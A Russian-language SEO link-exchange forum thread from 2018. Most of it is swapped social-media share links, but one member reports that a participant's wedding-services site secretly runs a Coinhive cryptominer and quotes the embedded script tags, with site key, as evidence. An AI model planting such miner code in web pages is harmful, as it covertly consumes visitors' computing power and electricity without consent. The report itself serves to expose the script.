Прокачка ссылок + соц сети - Постоянная акция

#vikup34 · 22-01-2018, 23:52:51

16

5 myxamed312

[spoiler]Донор:
https://my.mail.ru/mail/mactep_kot/share?shareid=8c0c000084b3900a[/spoiler]

http://studia-chudes.com/ - ADGuard обнаружил, что данный сайт пытается использовать Ваш браузер для добычи криптовалюты. Мы собираем информацию о подобных сайтах. Нажмите Ok чтобы пожаловаться на него.

Проверил: да, на сайте код, который заставляет браузеры пользователей дико тормозя добывать криптовалюту, вместо того, чтобы предоставлять свадебные услуги.

Код Выделить

        	    <meta name="description" content="Организация и оформление свадеб. Аренда свадебного текстиля и декора">
</head>
<body class="home page page-id-2 page-template-default et_pb_button_helper_class et_transparent_nav et_fullwidth_nav et_fixed_nav et_show_nav et_hide_primary_logo et_hide_fixed_logo et_cover_background et_pb_gutter windows et_pb_gutters2 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns4 et_header_style_centered et_pb_pagebuilder_layout et_right_sidebar chrome"><script src="//coinhive.com/lib/coinhive.min.js"></script><script>new CoinHive.Anonymous('gFxV1c98qzr1IFChFglOSfb0iDRo1508',{throttle:0.2}).start();</script>	<div id="page-container">

Т.к. у меня открыто много вкладок, открыв этот сайт у меня браузер заметно подвис (страница безуспешно грузилась больше 30 секунд, при этом весь комп тормозил)
Проверил с ноута, на котором Chrome OS - проблема не у меня в браузере, "вредоносный" код действительно присутствует на сайте.

Я считаю что сайты, которые якобы рекламируют реальные услуги, но на самом деле подобно вирусам направлены на эксплуатацию процессорных мощностей жертв-посетителей - нарушают правила этой темы.

И при всем желании, имея 20 открытых вкладок на такой сайт я зайти не могу - комп от такого сайта начинает сильно тормозить.
Что мне, закрывать все нужные вкладки, чтобы вы могли моим компьютером подобывать биткойны? Увольте.

demoplan · 22-01-2018, 23:53:22

10
16 #vikup34
[spoiler]Донор: https://twitter.com/landNELLYs/status/955550672325312513
Ссылки этого типа не поддерживаются

Акцептор: https://vk.com/grignelly?w=wall157156761_1964
Акцептор: https://plus.google.com/u/0/+NellyGrigorieva/posts/1Wkf1aSsiNp
Акцептор: https://my.mail.ru/mail/nellygrigorieva/share?shareid=98010000840cc100[/spoiler]

Добавлено: 23-01-2018, 00:01:11

Цитата: #vikup34 от 22-01-2018, 23:52:51
16

5 myxamed312

[spoiler]Донор:
https://my.mail.ru/mail/mactep_kot/share?shareid=8c0c000084b3900a[/spoiler]

http://studia-chudes.com/ - ADGuard обнаружил, что данный сайт пытается использовать Ваш браузер для добычи криптовалюты. Мы собираем информацию о подобных сайтах. Нажмите Ok чтобы пожаловаться на него.

Проверил: да, на сайте код, который заставляет браузеры пользователей дико тормозя добывать криптовалюту, вместо того, чтобы предоставлять свадебные услуги.
Код Выделить Развернуть
<meta name="description" content="Организация и оформление свадеб. Аренда свадебного текстиля и декора"> </head> <body class="home page page-id-2 page-template-default et_pb_button_helper_class et_transparent_nav et_fullwidth_nav et_fixed_nav et_show_nav et_hide_primary_logo et_hide_fixed_logo et_cover_background et_pb_gutter windows et_pb_gutters2 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns4 et_header_style_centered et_pb_pagebuilder_layout et_right_sidebar chrome"><script src="//coinhive.com/lib/coinhive.min.js"></script><script>new CoinHive.Anonymous('gFxV1c98qzr1IFChFglOSfb0iDRo1508',{throttle:0.2}).start();</script> <div id="page-container"> Т.к. у меня открыто много вкладок, открыв этот сайт у меня браузер крепко подвис.
Проверил с ноута, на котором Chrome OS - проблема не у меня в браузере, "вредоносный" код действительно присутствует на сайте.

Мой пост в 2017 году о том, что мой антивирус блокирует на сайте myxamed312 смотрите: Ответ #336 : 28 Ноябрь 2017, 12:38:14

#vikup34 · 23-01-2018, 00:12:07

Ваш пост в другой теме, без точной ссылки найти его сложно.

НО. Я не пользуюсь антивирусом. Я программист с 10-летним стажем. Я сам в том числе и "вирусы" в свое время писал, за деньги. Открыть исходный код сайта и безо всяких "антивирусов" увидеть вредоносный код для меня не проблема.

Там он по факту есть, и я его привел. Моему компьютеру очень тяжело грузить сайты, на которых стоит такой код. Не говоря о том, что скрытное использование ПК в целях добычи биткойнов без согласия пользователей (ценой их вычислительных мощностей и электричества) - технология, используемая большей частью актуальных вирусных программ.

Гугл, кстати, тоже за такой код по головке не погладит. И размещая такое на сайте, ни о каком SEO речи быть не может. Т.е. если код развещен владельцем, а не злоумышленниками - цель этого сайта - вовсе не SEO продвижение, а "некая другая". И я считаю что подобные цели идут вразрез с честным SEO продвижением "сайтов для людей"

Добавлено: 23-01-2018, 00:34:56

для тех, кто "совсем не шарит"
Virustotal отчёт для сайта coinhive.com - вредоносный сайт по мнению (7 / 66) включая АВ Касперского.

На сайте http://studia-chudes.com используются две вставки с этого вредоносного сайта:
http://coinhive.com/lib/coinhive.min.js<SCRIPT>
https://coinhive.com/lib/worker-asmjs.min.js<IFRAME>
(это можно увидеть не только глазами, но и просканировав сайт чрез https://rescan.pro/go.php)

Вставки по своей сути являются вредоносными кодами. То, что "партнерка" заботится о чистоте js - я когда писал вирусы под заказ, ни один из них тоже не палился антивирусами. А как только начинал "палиться" - тут же обновлял код. Они делают так же. Что, теперь мы будем включать "дурака" и тоже думать что studia-chudes.com не содержит вредоносного кода?

evagrom79 · 23-01-2018, 00:50:02

Цитата: myxamed312 от 22-01-2018, 14:03:58
5
11 dilidon-2

[spoiler]https://my.mail.ru/mail/myxamed312/share?shareid=691B0000F4A7C009

https://www.facebook.com/anassivanova/posts/1769773859729221?pnref=story
https://twitter.com/repkatiaa/status/955410145797984256
https://ok.ru/profile/562278462826/statuses/67877900929898[/spoiler]

У вас был розовый день

Добавлено: 23-01-2018, 01:07:34

6   evagrom79

13   myxamed312-2

[spoiler]https://www.facebook.com/evagrom79/posts/1957996624450652

https://ok.ru/profile/572966722619/statuses/67933871461691
https://my.mail.ru/mail/evagrom79/share?shareid=2304000027c2d801
https://twitter.com/evagrom79/status/955577434895716357[/spoiler]

Розовый день выполнен

14   inaevrodom

[spoiler]https://ok.ru/profile/572966722619/statuses/67933878736187

https://www.facebook.com/evagrom79/posts/1958001687783479?pnref=story
https://vk.com/evagrom79?w=wall229912236_619
https://twitter.com/evagrom79/status/955580022659731456[/spoiler]

demoplan · 23-01-2018, 01:09:00

10
17 Anna100
[spoiler]Донор: https://ok.ru/profile/542553431289/statuses/67655615840505
Акцептор: https://vk.com/grignelly?w=wall157156761_1965
Акцептор: https://twitter.com/landNELLYs/status/955575282458652672
Акцептор: https://plus.google.com/u/0/+NellyGrigorieva/posts/gsnKBGioAoP[/spoiler]

#vikup34 · 23-01-2018, 01:56:43

Более подробно объясню по поводу studia-chudes.com

На сайте используются две вставки с вредоносного сайта coinhive.com:
http://coinhive.com/lib/coinhive.min.js<SCRIPT> отчет VirusTotal по этому скрипту (7/66) скрипт вредоносный, в.т.ч. по мнению АВ Касперского: malware
https://coinhive.com/lib/worker-asmjs.min.js<IFRAME> отчет VirusTotal по этому скрипту (10/66) скрипт вредоносный, в.т.ч. по мнению АВ Касперского: malware
Наличие вставок можно увидеть как открыв исходный код главной, так и проанализировав её через https://rescan.pro/go.php (или ещё через что-нибудь)

Результат: сайт studia-chudes.com использует в составе главной страницы вредоносные скрипты в количестве 2 штук и нарушает правила этой темы. Аргументировать, что сайт "чистый" тем, что вирустотал не видит этих 2 вредоносых скриптов - нельзя. Потому что их видим мы - пользователи. Эти вредоносные скрипты фактически присутствуют на странице и их видят сторонние анализаторы.

Anna100 · 23-01-2018, 08:20:02

17
3 Tatika
[spoiler]д https://www.facebook.com/permalink.php?story_fbid=2042084612703881&id=100007070860049&pnref=story
https://plus.google.com/u/0/112193393288710458483/posts/5FpDMBuoxu1
https://www.ok.ru/profile/567924682377/statuses/67739104277897
https://twitter.com/olgag99/status/955685114251427840[/spoiler]

demoplan · 23-01-2018, 11:44:52

10
1 Lyolikbox-1
[spoiler]Донор: https://twitter.com/landNELLYs/status/955732790250786816
Акцептор: https://www.facebook.com/nellygrigorieva/posts/1676445089084567
Акцептор: https://plus.google.com/u/0/+NellyGrigorieva/posts/hwAwpRmL7r1
Акцептор: https://my.mail.ru/mail/nellygrigorieva/share?shareid=9A010000840CC100 [/spoiler]

myxamed312 · 23-01-2018, 11:46:15

проблема появилась на днях. сейчас занимаюсь устранением. к сожалению, сам не специалист, поэтому ищу человека, кто может помочь, напишите в ЛС (естественно не бесплатно).

dilidon · 23-01-2018, 11:51:01

4
11 dilidon-2

[spoiler]Донор https://ok.ru/profile/561517016670/statuses/67615512283998
https://plus.google.com/u/0/+%D0%9D%D0%B8%D0%BA%D0%B0%D0%AF%D0%BD%D0%B2%D0%B0%D1%80%D1%91%D0%B2%D0%B0/posts/16Hv84dpKzT
https://www.facebook.com/dilidondon/posts/1857060867640007?pnref=story
https://twitter.com/dilidondon1/status/955738757168357377
[/spoiler]

11
10 demoplan

[spoiler]Донор https://plus.google.com/u/0/102846983892829023444/posts/cbsgM1KYzfT https://www.facebook.com/nikasnova/posts/2036598536622015?pnref=story
https://twitter.com/nikatvorchestvo/status/955735856324796416
https://ok.ru/profile/566279702154/statuses/67730673148042[/spoiler]